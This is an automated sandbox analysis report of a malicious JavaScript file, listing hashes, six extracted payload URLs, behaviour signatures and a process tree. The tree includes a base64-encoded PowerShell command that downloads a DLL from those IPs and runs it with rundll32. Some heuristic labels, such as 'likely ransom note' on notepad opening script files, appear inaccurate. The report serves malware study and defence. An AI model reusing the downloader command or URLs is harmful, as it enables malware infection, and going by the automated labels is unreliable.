Analysis
-
max time kernel
1050s -
max time network
1052s -
platform
windows10-1703_x64 -
resource
win10-20230220-en -
resource tags
-
submitted
06-04-2023 07:18
General
-
Target
ClaimD_UkP(33).js
-
Size
82KB
-
MD5
1b538fb655d1ea772726b28a85ec7d15
-
SHA1
cfd966ba2f7c7ef654465c013686da1c7de6afe9
-
SHA256
23a5d13793ab459b6af65b981172dedc3ad6e2c745aa5eb79c3f1e948ee89037
-
SHA512
e2baca3ae7eb094fbda9c65c04d40ede9dfcdf6e29de7fdfc691dfc46d5c54baaa9d2da709cac7757ff7b9910838afdcd836f983e5fefc24cd98305bceb23532
-
SSDEEP
1536:8AzaBoRHY+8SqpqbKyOxc+IWsEltqlqheN:8AzaBoFYnFp0KA+IWs2tqlvN
Malware Config
Extracted
http://139.180.172.203/oUL2TJbgdevk.dat
http://154.7.253.203/iD6lQK.dat
http://198.44.140.75/ObaPI.dat
http://137.74.39.237/fkxoEdG.dat
http://87.236.146.53/PsEwwF0hC.dat
http://103.214.71.131/rehbF3vo.dat
Signatures
-
Blocklisted process makes network request 6 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 7 IoCs
-
Loads dropped DLL 6 IoCs
-
VMProtect packed file 5 IoCs
Detects executables packed with VMProtect commercial packer.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 3 IoCs
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
-
Drops file in Program Files directory 29 IoCs
-
Drops file in Windows directory 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
-
NSIS installer 6 IoCs
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies Internet Explorer settings 1 TTPs 2 IoCs
-
Modifies data under HKEY_USERS 2 IoCs
-
Modifies registry class 64 IoCs
-
Modifies system certificate store 2 TTPs 5 IoCs
-
NTFS ADS 4 IoCs
-
Opens file in notepad (likely ransom note) 8 IoCs
-
Suspicious behavior: EnumeratesProcesses 18 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 4 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 12 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 25 IoCs
-
Suspicious use of SetWindowsHookEx 22 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\ClaimD_UkP(33).js1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgA7ACQASABvAG0AbwB6AHkAZwBvAHUAcwAgAD0AIAAoACIAaAB0AHQAcAA6AC8ALwAxADMAOQAuADEAOAAwAC4AMQA3ADIALgAyADAAMwAvAG8AVQBMADIAVABKAGIAZwBkAGUAdgBrAC4AZABhAHQALABoAHQAdABwADoALwAvADEANQA0AC4ANwAuADIANQAzAC4AMgAwADMALwBpAEQANgBsAFEASwAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwAxADkAOAAuADQANAAuADEANAAwAC4ANwA1AC8ATwBiAGEAUABJAC4AZABhAHQALABoAHQAdABwADoALwAvADEAMwA3AC4ANwA0AC4AMwA5AC4AMgAzADcALwBmAGsAeABvAEUAZABHAC4AZABhAHQALABoAHQAdABwADoALwAvADgANwAuADIAMwA2AC4AMQA0ADYALgA1ADMALwBQAHMARQB3AHcARgAwAGgAQwAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwAxADAAMwAuADIAMQA0AC4ANwAxAC4AMQAzADEALwByAGUAaABiAEYAMwB2AG8ALgBkAGEAdAAiACkALgBzAHAAbABpAHQAKAAiACwAIgApADsAZgBvAHIAZQBhAGMAaAAgACgAJAB3AHUAegB6AGwAaQBuAGcAIABpAG4AIAAkAEgAbwBtAG8AegB5AGcAbwB1AHMAKQAgAHsAdAByAHkAIAB7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgACQAdwB1AHoAegBsAGkAbgBnACAALQBUAGkAbQBlAG8AdQB0AFMAZQBjACAAMgAwACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABmAGEAZwBnAGkAbgBnAFUAbgBtAGEAdABoAGUAbQBhAHQAaQBjAGEAbABsAHkALgBkAGwAbAA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUABcAGYAYQBnAGcAaQBuAGcAVQBuAG0AYQB0AGgAZQBtAGEAdABpAGMAYQBsAGwAeQAuAGQAbABsACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAAMQAwADAAMAAwADAAKQAgAHsAcwB0AGEAcgB0ACAAcgB1AG4AZABsAGwAMwAyACAAJABlAG4AdgA6AFQARQBNAFAAXABcAGYAYQBnAGcAaQBuAGcAVQBuAG0AYQB0AGgAZQBtAGEAdABpAGMAYQBsAGwAeQAuAGQAbABsACwARwBMADcAMAA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAIAB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADIAOwB9AH0A"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-Command" "if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l1jn4ium.0xp.ps1'"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\notepad.exe"C:\Windows\System32\notepad.exe" "C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zshvauor.qer.psm1"1⤵
- Opens file in notepad (likely ransom note)
-
C:\Windows\system32\WFS.exe"C:\Windows\system32\WFS.exe" /SendTo C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fuhbqokf.cwb.ps1 C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l1jn4ium.0xp.ps1 C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zshvauor.qer.psm1 C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_d2r5qsvs.1xk.psm11⤵
- Drops desktop.ini file(s)
- NTFS ADS
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\notepad.exe"C:\Windows\System32\notepad.exe" "C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l1jn4ium.0xp.ps1"1⤵
- Opens file in notepad (likely ransom note)
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" a -i#7zMap16193:582:7zEvent8287 -ad -saa -- "C:\Users\Admin\AppData\Local\Temp\Temp"1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\Temp\" -spe -an -ai#7zMap9918:64:7zEvent325271⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\Temp\" -spe -an -ai#7zMap3795:64:7zEvent48861⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" a -i#7zMap6950:70:7zEvent22551 -t7z -sae -- "C:\Users\Admin\AppData\Local\Temp.7z"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"1⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffc91d19758,0x7ffc91d19768,0x7ffc91d197782⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1976 --field-trial-handle=1788,i,1808851612450476340,6939174638024158789,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1680 --field-trial-handle=1788,i,1808851612450476340,6939174638024158789,131072 /prefetch:22⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2028 --field-trial-handle=1788,i,1808851612450476340,6939174638024158789,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2996 --field-trial-handle=1788,i,1808851612450476340,6939174638024158789,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2848 --field-trial-handle=1788,i,1808851612450476340,6939174638024158789,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3580 --field-trial-handle=1788,i,1808851612450476340,6939174638024158789,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4556 --field-trial-handle=1788,i,1808851612450476340,6939174638024158789,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4704 --field-trial-handle=1788,i,1808851612450476340,6939174638024158789,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4900 --field-trial-handle=1788,i,1808851612450476340,6939174638024158789,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4884 --field-trial-handle=1788,i,1808851612450476340,6939174638024158789,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=4888 --field-trial-handle=1788,i,1808851612450476340,6939174638024158789,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3224 --field-trial-handle=1788,i,1808851612450476340,6939174638024158789,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4880 --field-trial-handle=1788,i,1808851612450476340,6939174638024158789,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5108 --field-trial-handle=1788,i,1808851612450476340,6939174638024158789,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4884 --field-trial-handle=1788,i,1808851612450476340,6939174638024158789,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=5432 --field-trial-handle=1788,i,1808851612450476340,6939174638024158789,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 --field-trial-handle=1788,i,1808851612450476340,6939174638024158789,131072 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=4736 --field-trial-handle=1788,i,1808851612450476340,6939174638024158789,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=4472 --field-trial-handle=1788,i,1808851612450476340,6939174638024158789,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1668 --field-trial-handle=1788,i,1808851612450476340,6939174638024158789,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=816 --field-trial-handle=1788,i,1808851612450476340,6939174638024158789,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=2716 --field-trial-handle=1788,i,1808851612450476340,6939174638024158789,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=5716 --field-trial-handle=1788,i,1808851612450476340,6939174638024158789,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=4676 --field-trial-handle=1788,i,1808851612450476340,6939174638024158789,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4488 --field-trial-handle=1788,i,1808851612450476340,6939174638024158789,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5792 --field-trial-handle=1788,i,1808851612450476340,6939174638024158789,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4752 --field-trial-handle=1788,i,1808851612450476340,6939174638024158789,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6008 --field-trial-handle=1788,i,1808851612450476340,6939174638024158789,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5568 --field-trial-handle=1788,i,1808851612450476340,6939174638024158789,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3124 --field-trial-handle=1788,i,1808851612450476340,6939174638024158789,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1660 --field-trial-handle=1788,i,1808851612450476340,6939174638024158789,131072 /prefetch:82⤵
-
C:\Users\Admin\Downloads\Linux_Reader.exe"C:\Users\Admin\Downloads\Linux_Reader.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Program Files (x86)\DiskInternals\LinuxReader\LinuxReader64.exe"C:\Program Files (x86)\DiskInternals\LinuxReader\LinuxReader64.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Modifies registry class
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\DiskInternals\LinuxReader\DiskInternals.Preview.dllDiskInternals.Preview.dll 241366064 37004⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\DiskInternals\LinuxReader\LinuxReader.exe"C:\Program Files (x86)\DiskInternals\LinuxReader\LinuxReader.exe" -site DiskInternals79A68D3CA6DE48418CF52BF28BA55F10 8192 6914⤵
-
C:\Program Files (x86)\DiskInternals\LinuxReader\DiskInternals.Preview.dllDiskInternals.Preview.dll 241378721 37004⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Everything-1.4.1.1022.x64\" -spe -an -ai#7zMap16554:112:7zEvent99321⤵
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\Downloads\Everything-1.4.1.1022.x64\Everything.exe"C:\Users\Admin\Downloads\Everything-1.4.1.1022.x64\Everything.exe"1⤵
- Executes dropped EXE
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Downloads\Everything-1.4.1.1022.x64\Everything.exe"C:\Users\Admin\Downloads\Everything-1.4.1.1022.x64\Everything.exe"1⤵
- Executes dropped EXE
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SDRSVC1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4552 -s 20802⤵
- Program crash
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k wsappx -s AppXSvc1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\notepad.exe"C:\Windows\System32\notepad.exe" "C:\Users\Admin\Desktop\PSq\__PSScriptPolicyTest_d2r5qsvs.1xk.psm1"1⤵
- Opens file in notepad (likely ransom note)
-
C:\Windows\System32\notepad.exe"C:\Windows\System32\notepad.exe" "C:\Users\Admin\Desktop\PSq\__PSScriptPolicyTest_fuhbqokf.cwb.ps1"1⤵
- Opens file in notepad (likely ransom note)
-
C:\Windows\System32\notepad.exe"C:\Windows\System32\notepad.exe" "C:\Users\Admin\Desktop\PSq\__PSScriptPolicyTest_l1jn4ium.0xp.ps1"1⤵
- Opens file in notepad (likely ransom note)
-
C:\Windows\System32\notepad.exe"C:\Windows\System32\notepad.exe" "C:\Users\Admin\Desktop\PSq\__PSScriptPolicyTest_zshvauor.qer.psm1"1⤵
- Opens file in notepad (likely ransom note)
-
C:\Windows\System32\notepad.exe"C:\Windows\System32\notepad.exe" "C:\Users\Admin\Desktop\PSq\__PSScriptPolicyTest_fuhbqokf.cwb.ps1"1⤵
- Opens file in notepad (likely ransom note)
-
C:\Windows\System32\notepad.exe"C:\Windows\System32\notepad.exe" "C:\Users\Admin\Desktop\PSq\__PSScriptPolicyTest_l1jn4ium.0xp.ps1"1⤵
- Opens file in notepad (likely ransom note)
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\DiskInternals\LinuxReader\DiskInternals.Preview.dllFilesize
10.4MB
MD521a90d8d45f490ee255efea4dc56019b
SHA1366eaeb281c3e619b64f087b4a66e5ac27c7c188
SHA256c6a7ae0938491038fdad76fa164da4d4ad9db36b6c9ae65b31408120740fb0ba
SHA512fdb4c4ce7ccd6cb8e14a79c281f64c603c0a5b24ef7aa8d239fe066586b6099d5005c617bdac825f81724209d75b99fb10c59fea55d90f6609c39cf994787dc7
-
C:\Program Files (x86)\DiskInternals\LinuxReader\DiskInternals.Preview.dllFilesize
10.4MB
MD521a90d8d45f490ee255efea4dc56019b
SHA1366eaeb281c3e619b64f087b4a66e5ac27c7c188
SHA256c6a7ae0938491038fdad76fa164da4d4ad9db36b6c9ae65b31408120740fb0ba
SHA512fdb4c4ce7ccd6cb8e14a79c281f64c603c0a5b24ef7aa8d239fe066586b6099d5005c617bdac825f81724209d75b99fb10c59fea55d90f6609c39cf994787dc7
-
C:\Program Files (x86)\DiskInternals\LinuxReader\DiskInternals.Preview.dllFilesize
10.4MB
MD521a90d8d45f490ee255efea4dc56019b
SHA1366eaeb281c3e619b64f087b4a66e5ac27c7c188
SHA256c6a7ae0938491038fdad76fa164da4d4ad9db36b6c9ae65b31408120740fb0ba
SHA512fdb4c4ce7ccd6cb8e14a79c281f64c603c0a5b24ef7aa8d239fe066586b6099d5005c617bdac825f81724209d75b99fb10c59fea55d90f6609c39cf994787dc7
-
C:\Program Files (x86)\DiskInternals\LinuxReader\LinuxReader.exeFilesize
20.5MB
MD5701499766a4605bebe206b29447d8e18
SHA100f7fe10f7beb7a215aaf54d72db2a4df5d166e9
SHA256b13b6e547e7557fc93891d731f18b7f36223907998f4a13bd39b573243553cd5
SHA5129669df5c4d15922c8aeb1ac5ccbe44ba10268af5d7af09731c963099dfb725f8494cb2b4899140c525b997126dc461cf5566788555be97c6695d8e75cfac65b7
-
C:\Program Files (x86)\DiskInternals\LinuxReader\LinuxReader64.exeFilesize
29.2MB
